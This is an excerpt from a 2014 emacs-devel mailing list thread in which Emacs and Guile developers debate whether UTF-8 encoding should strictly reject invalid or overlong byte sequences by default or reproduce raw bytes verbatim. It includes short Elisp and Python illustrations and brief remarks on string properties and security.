  2014-10-08  0:47                                                                     ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Andreas Schwab @ 2014-10-07 17:38 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>
>>> Andreas Schwab <schwab@suse.de> writes:
>>>
>>>> David Kastrup <dak@gnu.org> writes:
>>>>
>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>
>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>
>>>>>>> Andreas Schwab <schwab@suse.de> writes:
>>>>>>>
>>>>>>>> David Kastrup <dak@gnu.org> writes:
>>>>>>>>
>>>>>>>>> One problem with that is that quite often Emacs' choice of a coding
>>>>>>>>> system for a buffer is the result of heuristics rather than dependable
>>>>>>>>> information.  Not making a fuzz might often be simplest.
>>>>>>>>
>>>>>>>> If you try to save a buffer Emacs will check whether all characters are
>>>>>>>> encodable, and complain (and ask) if they aren't.
>>>>>>>
>>>>>>> Sure, but a raw byte is trivially encodable since it is no character.
>>>>>>
>>>>>> This is a contradiction.  It isn't a character, so it isn't encodable.
>>>>>
>>>>> The character representation of "raw byte" is trivially encodable since
>>>>> it represents a single byte in any encoding.
>>>>
>>>> No encoding (except raw-text) can encode characters from the eight-bit
>>>> charset.
>>>
>>> (encode-coding-string (string (decode-char 'eight-bit 128)) 'utf-8)
>>> => "\200"
>>
>> That's what you get if you *force* the coding system.
>
> It would appear that you are forcing your logic.  "No encoding can ..."
> does not mean that.

That's what Emacs told me, with the heuristics you are talking about.

Andreas.

-- 
Andreas Schwab, schwab@linux-m68k.org
GPG Key fingerprint = 58CA 54C7 6D53 942B 1756  01D3 44D5 214B 8276 4ED5
"And now for something completely different."




* Re: Emacs Lisp's future
  2014-10-07 16:34                                                       ` Mark H Weaver
@ 2014-10-07 17:50                                                         ` David Kastrup
  2014-10-07 18:36                                                           ` Mark H Weaver
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-07 17:50 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> Andreas Schwab <schwab@suse.de> writes:
>
>> Mark H Weaver <mhw@netris.org> writes:
>>
>>> However, if the overlong sequence came from the network, and Emacs
>>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>>> arguments to subprocesses), that's not good.  It exposes another program
>>> to invalid input -- a program that might not be designed for exposure to
>>> possible attacks via overlong encodings.
>>
>> At least it doesn't make it worse (it is unchanged from the situation if
>> you remove Emacs as a filter).
>
> In the case of mere "filtering", you might be right in some cases.
>
> However, the case I'm worried about is where some small piece of the
> hostile input is extracted and passed as an argument to another program.
> In cases like this it doesn't make sense to think of emacs as a
> "filter", and you'd never be able to "remove" it.
>
> It's like saying that a web application that passes unsanitized input to
> an SQL query "doesn't make it worse", and that the situation is
> unchanged from if you provided public access to the SQL database.

If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize
input.  That's different from GUILE/Emacs deciding over your head what
is good for your application.

Again, confusing the responsibilities and capabilities of an engine with
those of an application is sure to lead to mismatches between
requirements and capabilities.  An engine has to work.  Not just given
certain circumstances, but always.  Anything else is a recipe for
trouble.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 16:01                                                 ` David Kastrup
@ 2014-10-07 18:15                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 18:15 UTC (permalink / raw)
  To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

David Kastrup writes:

 > I repeat: that is to be the choice of the application rather than
 > the engine.

Which is what *I* said.

But the engine *should* have a default for convenience of at least
some use cases.  What Mark (AFAICS) and I want is to default to not
emitting broken Unicode.  If the application chooses to do so, it
should do so explicitly.

 > "We know better than the application writer what he wants" is
 > rarely going to work to the satisfaction of all.

Again, I've said that in this thread already.

Finally, note that there's nothing nonconformant about rawbytes in the
internal representation per se.  The Unicode standard is for
*interchange* and says nothing about Emacs buffers.  If TeX
produces invalid UTF-8 and AUCTeX accepts that and converts invalid
UTF-8 to rawbytes, that's not a problem -- everybody knows what is
going on -- and conformance is a non-issue, since it's all internal.
(I don't claim Mark agrees with this paragraph.  And he probably
doesn't for the applications he envisions, because they are modular
(where Emacs is monolithic), and therefore strings in internal
representation are passed across module boundaries.)

But Emacs should not save that buffer to a file or send its contents
to a network stream, without either explicit permission from the user,
or explicit configuration of the output stream by the application.

Autosaves are another thorny problem.  I suppose they will be handled
by declaring them conformant only to Emacs' needs.





* Re: Emacs Lisp's future
  2014-10-07 15:40                                                       ` David Kastrup
@ 2014-10-07 18:32                                                         ` Stephen J. Turnbull
  2014-10-07 18:41                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 18:32 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Mark H Weaver, Eli Zaretskii

David Kastrup writes:

 > Just bombing out in some predetermined manner in some fixed location is
 > not a substitute for properly planned behavior.

Nobody proposed that, so please stop arguing against it.

 > Unless told differently, a tool like GUILE or Emacs, when used as a
 > filter, should do exactly _those_ filtering operations you tell it.

Right.  All Mark and I want is to default safely.  I.e., if you invoke an
encoding named "utf-8", you get strictly conformant output.

When Emacs is being used as a filter, you just have to use the
'utf-8-with-rawbytes coding system, and when Emacs is being used for
what is presumably valid text, you use the 'utf-8 coding system.  IOW,
it's use of the *-with-rawbytes coding systems that turns Emacs into a
filter.

I think that is way preferable to the alternative where 'utf-8 gives
rawbytes, and you have to use 'utf-8-strict to get validation.





* Re: Emacs Lisp's future
  2014-10-07 17:50                                                         ` David Kastrup
@ 2014-10-07 18:36                                                           ` Mark H Weaver
  2014-10-07 18:56                                                             ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 18:36 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> Andreas Schwab <schwab@suse.de> writes:
>>
>>> Mark H Weaver <mhw@netris.org> writes:
>>>
>>>> However, if the overlong sequence came from the network, and Emacs
>>>> propagates it unchanged to internal subsystems[*] (e.g. via command-line
>>>> arguments to subprocesses), that's not good.  It exposes another program
>>>> to invalid input -- a program that might not be designed for exposure to
>>>> possible attacks via overlong encodings.
>>>
>>> At least it doesn't make it worse (it is unchanged from the situation if
>>> you remove Emacs as a filter).
>>
>> In the case of mere "filtering", you might be right in some cases.
>>
>> However, the case I'm worried about is where some small piece of the
>> hostile input is extracted and passed as an argument to another program.
>> In cases like this it doesn't make sense to think of emacs as a
>> "filter", and you'd never be able to "remove" it.
>>
>> It's like saying that a web application that passes unsanitized input to
>> an SQL query "doesn't make it worse", and that the situation is
>> unchanged from if you provided public access to the SQL database.
>
> If GUILE or Emacs is supposed to sanitize input, you tell it to sanitize
> input.  That's different from GUILE/Emacs deciding over your head what
> is good for your application.

I've already said more than once that I agree Guile and Emacs should
provide the *option* to handle invalid byte sequences transparently, if
explicitly requested to do so, and furthermore that this is appropriate
default behavior when editing files.

What I'm saying is that in most other cases, the codecs should be
strict, and therefore this should be the default behavior of the
underlying functions.  When users call an Emacs function to decode
UTF-8, it should report an error if that input isn't actually UTF-8.
Conversely, when encoding UTF-8, the output should be UTF-8 and not some
arbitrary byte sequence.

Relying on users to explicitly sanitize the result of decoding UTF-8 to
check for "raw bytes", and to explicitly check for "raw bytes" before
encoding UTF-8 (as if that term didn't already have a well-known meaning
that excludes arbitrary byte sequences) is a recipe for security holes.

       Mark




* Re: Emacs Lisp's future
  2014-10-07 18:32                                                         ` Stephen J. Turnbull
@ 2014-10-07 18:41                                                           ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 18:41 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Mark H Weaver, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> David Kastrup writes:
>
>  > Just bombing out in some predetermined manner in some fixed location is
>  > not a substitute for properly planned behavior.
>
> Nobody proposed that, so please stop arguing against it.
>
>  > Unless told differently, a tool like GUILE or Emacs, when used as a
>  > filter, should do exactly _those_ filtering operations you tell it.
>
> Right.  All Mark and I want is to default safely.  Ie, if you invoke an
> encoding named "utf-8", you get strictly conformant output.
>
> When Emacs is being used as a filter, you just have to use the
> 'utf-8-with-rawbytes coding system, and when Emacs is being used for
> what is presumably valid text, you use the 'utf-8 coding system.  IOW,
> it's use of the *-with-rawbytes coding systems that turns Emacs into a
> filter.
>
> I think that is way preferable to the alternative where 'utf-8 gives
> rawbytes, and you have to use 'utf-8-strict to get validation.

Emacs' current behavior where the low-level operations _obey_ _without_
_asking_ is quite preferable.  Again, you want to have the engine's
responsibilities confused with the application's responsibilities.  And
that means that you generally have to work around the engine for getting
basic work done.  And figure out just where in the operating layers you
have to apply overrides in order to get "don't mess with this"
semantics.

Since verification is best applied at a single place in an application,
being denied control over that place whenever you don't have _every_
_single_ _layer_ under your own control is a nuisance.

I am glad that Emacs does not get in my hair as an application
programmer like that, and it would be doubly appropriate for GUILE not
to do that.  GUILE is supposed to be an extension language and system.
As such, it should not try governing how an application is organizing
its verification processes.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 18:36                                                           ` Mark H Weaver
@ 2014-10-07 18:56                                                             ` David Kastrup
  2014-10-07 19:21                                                               ` Stephen J. Turnbull
  2014-10-07 23:11                                                               ` Mark H Weaver
  0 siblings, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-07 18:56 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> Relying on users to explicitly sanitize the result of decoding UTF-8
> to check for "raw bytes", and to explicitly check for "raw bytes"
> before encoding UTF-8 (as if that term didn't already have a
> well-known meaning that excludes arbitrary byte sequences) is a recipe
> for security holes.

You are calling "application programmers" here "users" and call them
incapable of designing their application.  Any application in need of
sanitizing will not stop in its requirements at UTF-8 sanitization.

You cannot successfully cater for clueless application programmers.  And
nobody says that GUILE should _crash_ when provided non-sanitized UTF-8.
It has to be able to deal with everything thrown at it.  And you want it
to _not_ do that by default.  That means that _any_ programmer wanting
to do his own verification will not be able to use _any_ module provided
by someone else which does not explicitly override the defaults, since
then modules he has no control over will refuse cooperating.

GUILE is an extension language and system.  It should _not_ do policing.
Every attempt at policing makes it impossible to design the policing
into the place where it makes sense.

Worse, it leads to sloppy code since then people start to consider an
internal UTF-8 based encoding to be identical to an external UTF-8
encoding, making it _impossible_ to design byte-transparent workflows.

That is the current state of GUILE 2, and as an application programmer
I can testify that it is a huge headache.  Both in practice as well as
conceptually.

I am glad that Emacs started its history with a multibyte encoding
incompatible with any external encoding since that has given it lots of
impetus to get that distinction right.

With the "we don't want to cater for raw bytes by default" attitude
you'll never get away in a reasonably reliable manner from the "our code
will not deal with raw bytes" situation you have now with regard to
string manipulation.

It took Emacs years to get this into a really reliable and good state,
with many more active users of multibyte character sets than GUILE has.

-- 
David Kastrup




* Re: Emacs Lisp's future
  2014-10-07 18:56                                                             ` David Kastrup
@ 2014-10-07 19:21                                                               ` Stephen J. Turnbull
  2014-10-07 23:11                                                               ` Mark H Weaver
  1 sibling, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07 19:21 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa,
	monnier, Andreas Schwab, Eli Zaretskii

David Kastrup writes:

 > With the "we don't want to cater for raw bytes by default" attitude
 > you'll never get away in a reasonably reliable manner from the "our code
 > will not deal with raw bytes" situation you have now with regard to
 > string manipulation.

If Emacs and Emacs Lisp developers never can make it work, I think
that says more about Emacs than about the concept of standards-based
program design.  I'm sure the Guile community will succeed as Python
did.

It took Python about 3 months to implement PEP 383, another 6 to
actually publicly release a Python using it, and no, Python has never
defaulted to anything but strict error handling ("crash and traceback
on invalid input") since.

Nobody complains, because in practice strict is almost good enough for
interactive programs (ask the user to clean up the input and resubmit),
and the few who do need rawbytes are perfectly happy writing

  stream = open(filename, 'r', encoding='utf-8', errors='surrogateescape')

when it's needed.
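
For readers unfamiliar with that handler, here is a small sketch of what
the two modes do with the overlong sequence 0xC0 0xA2 discussed
elsewhere in this thread.  It uses bytes.decode and str.encode instead
of open(); they accept the same errors argument.  The helper names are
made up for illustration:

```python
# 0xC0 0xA2 is an overlong (and therefore invalid) UTF-8 encoding of '"'.
overlong = b"\xc0\xa2"


def strict_decode_ok(data):
    """Return True if data is accepted by the default (strict) UTF-8 decoder."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def strict_encode_ok(text):
    """Return True if text is accepted by the default (strict) UTF-8 encoder."""
    try:
        text.encode("utf-8")
        return True
    except UnicodeEncodeError:
        return False


# Opt-in reversible decoding: each invalid byte becomes a lone surrogate
# in the range U+DC80..U+DCFF.
text = overlong.decode("utf-8", errors="surrogateescape")

# Opt-in reversible encoding: the lone surrogates turn back into the
# original bytes.
roundtrip = text.encode("utf-8", errors="surrogateescape")

# Without the opt-in, both directions refuse the data.
rejected_on_input = not strict_decode_ok(overlong)
rejected_on_output = not strict_encode_ok(text)
```

So the raw bytes round-trip only when both the decoding and the encoding
side ask for it; a string carrying escaped bytes cannot leak out through
a plain 'utf-8' encode by accident.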





* Re: Emacs Lisp's future
  2014-10-07 18:56                                                             ` David Kastrup
  2014-10-07 19:21                                                               ` Stephen J. Turnbull
@ 2014-10-07 23:11                                                               ` Mark H Weaver
  2014-10-08  3:03                                                                 ` David Kastrup
  2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07 23:11 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:
> You cannot successfully cater for clueless application programmers.

It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

     Mark




* Re: Emacs Lisp's future
  2014-10-07 14:14                                                 ` David Kastrup
       [not found]                                                   ` <"<83y4srjaot.fsf"@gnu.org>
  2014-10-07 15:15                                                   ` Mark H Weaver
@ 2014-10-08  0:47                                                   ` Richard Stallman
  2014-10-08  7:13                                                     ` Eli Zaretskii
  2014-10-09  7:36                                                     ` David Kastrup
  2 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:47 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    UTF-8 is defined as not containing "overlong" sequences, so Emacs
    decodes them into two raw-byte indicating characters, one indicating
    0xC0, one indicating 0xA2.  When encoding, it reassembles them into
    0xC0 0xA2.

In that case, it might be reasonable to ask the user whether to accept
a UTF-8 file decoding that contains any raw-byte characters.

What do people think of this?

    One problem with that is that quite often Emacs' choice of a coding
    system for a buffer is the result of heuristics rather than dependable
    information.  Not making a fuzz might often be simplest.

Could you explain what "fuzz" means here?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-07 16:52                                                                   ` David Kastrup
  2014-10-07 17:38                                                                     ` Andreas Schwab
@ 2014-10-08  0:47                                                                     ` Richard Stallman
  2014-10-08  7:19                                                                       ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:47 UTC (permalink / raw)
  To: David Kastrup; +Cc: schwab, emacs-devel

    What you mean is that Emacs is asked to _select_ or to _verify_ a coding
    system (as is customary for interactive editing of a file) it will do so
    and get back to the user when necessary.

    But that is _quite_ different from Emacs being _incapable_ of encoding
    raw bytes to a file or a stream of a specified encoding.  It means that
    when you are using an _application_ that is expected to deliver only
    decodable characters, then the _application_ will _ask_ before going
    ahead.

    But the _engine_ is perfectly capable of going through here.

I think that both of these points are correct.  But there is still the
question of what the engine should do by default.

We can set the defaults for those non-file interfaces so as to reject
invalid UTF-8 sequences.  Then a program could specify to override the
default and allow them.






^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  3:34                                       ` Stephen J. Turnbull
@ 2014-10-08  0:48                                         ` Richard Stallman
  2014-10-08  2:09                                           ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-08  0:48 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

     > Given a self-contained Scheme program, it should be easy to determine
     > whether it ever examines or sets string text properties.  Is that enough
     > to provide the same "security" benefits in practice?

    No.  Often systems are constructed by assembling separately developed
    modules.  If a "security" module responsible for checking data
    validity is property-oblivious, then maliciously crafted properties
    may be able to cause "evil" behavior in a property-sensitive module
    supposedly protected by the "security" module.

I don't understand what sort of danger you're worried about.
Can you present a concrete scenario?

    You can impugn the skills of the programmers responsible,

That comes from you, not from me.

							      or say it's
    all very hypothetical

It is all very abstract as well as hypothetical.

If you want to convince me that this is a problem, you need to present
sufficient arguments to outweigh the very clear problem that would be
caused by NOT adding property lists to strings.  You need to convince me
that it makes sense to try to prevent communication between two
Scheme programs in the same process.





^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:48                                         ` Richard Stallman
@ 2014-10-08  2:09                                           ` Stephen J. Turnbull
  2014-10-08  3:07                                             ` David Kastrup
  2014-10-09  1:19                                             ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-08  2:09 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > If you want to convince me that [a property list vector for
 > implicitly transmitting information across module boundaries] is a
 > problem,

I'm not trying to convince you; your evidentiary requirements are way
too high for me to satisfy in the time available.

I just want to make sure that Emacs developers in general are aware
that if string properties are added to Guile itself, Emacs will be a
potential vector for attacks.  For example, by providing a "back
channel" for malicious information if Emacs is used to develop a
management interface for a web service written in Guile which directly
accesses Guile modules used in the web service.

 > you need to present sufficient arguments to outweigh the very clear
 > problem that would be caused by NOT adding property lists to
 > strings.

You misunderstand me.  Emacs obviously needs property lists on
strings.  Nobody in their right mind would suggest otherwise.

What I advocate is that string properties should be implemented by
using Guile facilities for defining types, not by changing Guile.
External modules that want to use Emacs property lists for whatever
reason can explicitly import that interface from Emacs.  However,
those properties should not be passed to non-Emacs modules implicitly.
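
The distinction drawn above (properties carried by a separate type that
modules must import explicitly, versus properties riding along on the
native string type) can be sketched as follows.  This is a Python
analogue, not Guile or Emacs code, and every name in it (PropertyString,
TaggedStr, external_validator) is hypothetical.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class PropertyString:
    """Explicit wrapper: the text and its properties travel as a distinct type."""
    text: str
    properties: dict = field(default_factory=dict)


class TaggedStr(str):
    """Implicit variant: a native string that silently carries properties."""

    def __new__(cls, text, properties=None):
        obj = super().__new__(cls, text)
        obj.properties = dict(properties or {})
        return obj


def external_validator(value):
    """Stand-in for a property-oblivious module that only knows plain strings."""
    if not isinstance(value, str):
        raise TypeError("expected a plain string")
    return value.isalnum()


wrapped = PropertyString("abc123", {"face": "bold"})
tagged = TaggedStr("abc123", {"face": "bold"})

# The wrapper must be unpacked on purpose; only the text crosses the boundary.
explicit_ok = external_validator(wrapped.text)

# The tagged string passes the same check with its properties still attached.
implicit_ok = external_validator(tagged)
```

With the wrapper, handing properties to another module is a visible
decision; with the tagged native string, the validator never learns that
extra data came along.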



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 23:11                                                               ` Mark H Weaver
@ 2014-10-08  3:03                                                                 ` David Kastrup
  2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08  3:03 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

Mark H Weaver <mhw@netris.org> writes:

> David Kastrup <dak@gnu.org> writes:
>> You cannot successfully cater for clueless application programmers.
>
> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

We are not talking about "producing" but "reproducing" here.  It is
clueless to expect manure to magically turn into roses without
instructions.  If you need sanitized output, you need to sanitize your
input at some point of time.  If that point of time is not under your
control, that will cause worse problems than you started with.  You get
denial-of-service attack vectors when raising exceptions, you get
quoting attack vectors when silently removing or replacing characters.
It is much harder to deal with those behaviors reliably than it is to
deal with faithful reproduction, letting you put the cleanup strategies
at the place in processing where they belong.  Like, before any quoting,
and after any unquoting.

And, of course, having the full power of GUILE's string and regexp
processing for dealing programmatically with that cleanup.  There is no
"we don't have to deal with that input anyway" excuse for a programming
platform.

Emacs learnt its MULE lessons the hard way.  And these days, it does not
let its application programmers down.  And since the programmers were
free to put any safety nets at any place _they_ want without risking
gratuitous breakage, Emacs will inform the user of possible coding
problems exactly where the application programmers considered warnings
appropriate, and with exactly the fallbacks and options that the
programmers considered appropriate for that particular use case.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  2:09                                           ` Stephen J. Turnbull
@ 2014-10-08  3:07                                             ` David Kastrup
  2014-10-09  3:06                                               ` Stephen J. Turnbull
  2014-10-09  1:19                                             ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-08  3:07 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Richard Stallman writes:
>
>  > If you want to convince me that [a property list vector for
>  > implicitly transmitting information across module boundaries] is a
>  > problem,
>
> I'm not trying to convince you; your evidentiary requirements are way
> too high for me to satisfy in the time available.

Newsflash: Emacs 19 has been released in the mean time.  That's good
since we have an example we can study now with regard to the problems
text properties may cause.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:47                                                   ` Richard Stallman
@ 2014-10-08  7:13                                                     ` Eli Zaretskii
  2014-10-09  1:19                                                       ` Richard Stallman
  2014-10-09  7:36                                                     ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08  7:13 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Tue, 07 Oct 2014 20:47:04 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: eliz@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     UTF-8 is defined as not containing "overlong" sequences, so Emacs
>     decodes them into two raw-byte indicating characters, one indicating
>     0xC0, one indicating 0xA2.  When encoding, it reassembles them into
>     0xC0 0xA2.
> 
> In that case, it might be reasonable to ask the user whether to accept
> a UTF-8 file decoding that contains any raw-byte characters.
> 
> What do people think of this?

We do ask, but only at buffer save time.  Asking questions when
visiting a file is perceived as a nuisance, because our heuristics
that detect these cases are imperfect and tend to have high enough
false positive rate that annoys people.
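
The quoted behaviour (overlong bytes kept as raw-byte characters and
reassembled on encoding) can be illustrated outside Emacs.  The sketch
below is a Python analogue, not Emacs code: Python's "surrogateescape"
error handler stands in for Emacs raw-byte characters, and the function
names are made up for illustration.

```python
# 0xC0 0xA2 is the overlong two-byte form of U+0022 (the double quote).
OVERLONG_QUOTE = b"\xc0\xa2"


def decode_strict(data: bytes) -> str:
    """Reject anything that is not valid UTF-8."""
    return data.decode("utf-8")


def decode_preserving(data: bytes) -> str:
    """Keep each undecodable byte as a placeholder character."""
    return data.decode("utf-8", errors="surrogateescape")


def encode_preserving(text: str) -> bytes:
    """Turn placeholder characters back into the original bytes."""
    return text.encode("utf-8", errors="surrogateescape")


def naive_two_byte_value(data: bytes) -> int:
    """Code point a lenient decoder would compute for a two-byte sequence."""
    return ((data[0] & 0x1F) << 6) | (data[1] & 0x3F)


decoded = decode_preserving(OVERLONG_QUOTE)        # two placeholder characters
round_tripped = encode_preserving(decoded)         # the original two bytes
hidden_char = chr(naive_two_byte_value(OVERLONG_QUOTE))
```

Here `decoded` holds two placeholder characters rather than a quote
mark, and encoding it again reproduces the input bytes exactly, while
`decode_strict` raises UnicodeDecodeError on the same input.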



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  0:47                                                                     ` Richard Stallman
@ 2014-10-08  7:19                                                                       ` Eli Zaretskii
  2014-10-08  7:37                                                                         ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-08  7:19 UTC (permalink / raw)
  To: rms; +Cc: schwab, dak, emacs-devel

> Date: Tue, 07 Oct 2014 20:47:46 -0400
> From: Richard Stallman <rms@gnu.org>
> Cc: schwab@suse.de, emacs-devel@gnu.org
> 
> We can set the defaults for those non-file interfaces so as to reject
> invalid UTF-8 sequences.  Then a program could specify to override the
> default and allow them.

That has been tried (not with UTF-8, but I don't think this matters),
and failed miserably.  The experience taught us that Emacs users
definitely don't want Emacs to do _anything_ about the unmodified
parts of text, except copy it verbatim.  Even the question we ask at
buffer-save time is sometimes reported as an annoyance.

Let's not repeat those mistakes.  The current design principle is that
the application or the user need to specifically ask for strict
conformance, if they want it.  For example, if someone was designing a
secure application on top of Emacs, they would need to opt-in such
behavior.
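
The design principle described above (verbatim reproduction by default,
strict conformance only on request) might look like this in outline.
This is a Python sketch under stated assumptions, not an Emacs
interface: the function name and its "strict" parameter are
hypothetical, and "surrogateescape" again plays the role of Emacs
raw-byte characters.

```python
def encode_utf8(text: str, strict: bool = False) -> bytes:
    """Encode text as UTF-8.

    By default, characters that stand for raw bytes are written back as
    those bytes.  With strict=True, such characters are refused, so the
    output is guaranteed to be valid UTF-8.
    """
    errors = "strict" if strict else "surrogateescape"
    return text.encode("utf-8", errors=errors)


# Text that was read from a file containing the stray byte 0xFF.
text = b"plain \xff text".decode("utf-8", errors="surrogateescape")

verbatim = encode_utf8(text)  # default: the byte 0xFF is reproduced as-is

try:
    encode_utf8(text, strict=True)  # opt-in: the caller asked for conformance
    strict_failed = False
except UnicodeEncodeError:
    strict_failed = True
```

The alternative default argued for elsewhere in the thread would simply
flip the default value of the parameter; the mechanism is the same
either way.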



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  7:19                                                                       ` Eli Zaretskii
@ 2014-10-08  7:37                                                                         ` David Kastrup
  0 siblings, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-08  7:37 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: schwab, rms, emacs-devel

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Tue, 07 Oct 2014 20:47:46 -0400
>> From: Richard Stallman <rms@gnu.org>
>> Cc: schwab@suse.de, emacs-devel@gnu.org
>> 
>> We can set the defaults for those non-file interfaces so as to reject
>> invalid UTF-8 sequences.  Then a program could specify to override the
>> default and allow them.
>
> That has been tried (not with UTF-8, but I don't think this matters),
> and failed miserably.  The experience taught us that Emacs users
> definitely don't want Emacs to do _anything_ about the unmodified
> parts of text, except copy it verbatim.  Even the question we ask at
> buffer-save time is sometimes reported as an annoyance.

As one data point, PostScript and PDF files generally consist of
plain readable text (I seem to remember latin-1 with an option to use
some BOM in strings for getting UTF16 locally but I may be mistaken) but
with inserted binary objects.  At least with PostScript, the file is
linear and one can edit in changes if one wants to.  Obviously, any
unintentional changes in the binary sections are going to stop the
result from working.

This is definitely a case where you want to have better editing
capabilities than a hexdump would give you (as you cannot insert or
delete strings comfortably in a hexdump), but you still want the binary
portions to remain undisturbed as a block.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-08  3:03                                                                 ` David Kastrup
@ 2014-10-08 15:03                                                                   ` Mark H Weaver
  2014-10-08 15:11                                                                     ` Eli Zaretskii
  2014-10-08 15:54                                                                     ` David Kastrup
  0 siblings, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-08 15:03 UTC (permalink / raw)
  To: David Kastrup
  Cc: Richard Stallman, Andreas Schwab, dmantipov, emacs-devel, handa,
	monnier, Eli Zaretskii, stephen

David Kastrup <dak@gnu.org> writes:

> Mark H Weaver <mhw@netris.org> writes:
>
>> David Kastrup <dak@gnu.org> writes:
>>> You cannot successfully cater for clueless application programmers.
>>
>> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.
>
> We are not talking about "producing" but "reproducing" here.

